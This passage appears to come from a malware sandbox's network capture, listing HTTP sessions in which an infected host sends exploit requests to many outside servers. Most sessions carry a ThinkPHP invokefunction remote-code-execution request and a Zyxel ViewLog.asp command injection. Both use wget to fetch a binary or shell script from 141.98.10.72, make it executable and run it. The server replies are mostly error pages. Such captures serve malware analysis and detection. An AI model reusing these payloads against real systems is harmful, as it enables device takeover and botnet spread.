                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4192.168.2.1535190112.180.15.8480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.080472946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.366687059 CET506INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:28:46 GMT
                                                      Server: httpd
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5192.168.2.1533812112.223.39.2980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.093985081 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.396989107 CET327INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 17:29:11 GMT
                                                      Server: Boa/0.94.14rc19
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>
                                                      Feb 14, 2024 09:28:50.404203892 CET327INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 17:29:11 GMT
                                                      Server: Boa/0.94.14rc19
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6192.168.2.1543794112.135.211.25580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.121988058 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7192.168.2.156012095.101.201.14880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.570065022 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.777223110 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:28:47 GMT
                                                      Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 37 26 23 34 36 3b 34 31 62 38 62 65 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;16f01002&#46;1707899327&#46;41b8be78</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8192.168.2.154508695.100.127.1580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.585597992 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.808783054 CET478INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 256
                                                      Expires: Wed, 14 Feb 2024 08:28:47 GMT
                                                      Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 61 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 37 26 23 34 36 3b 64 39 62 61 35 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3a8e2117&#46;1707899327&#46;d9ba5b</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9192.168.2.155248495.47.167.6580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.589848995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.839899063 CET364INHTTP/1.1 505 HTTP Version not supported
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 140
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10192.168.2.156080695.165.139.21080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.591618061 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.821935892 CET115INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11192.168.2.155262095.215.242.2180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.609966040 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.857074022 CET420INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:28:48 GMT
                                                      Server: Apache/2.2.15 (CentOS)
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12192.168.2.155426895.86.78.14680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.616647959 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13192.168.2.155889631.136.107.178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.621190071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:50.715286016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:56.859060049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:08.891005993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:33.722174883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.872685909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14192.168.2.154971231.136.153.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.621970892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:48.315314054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:49.691282988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:52.507227898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:58.139240980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:09.146725893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.674072981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
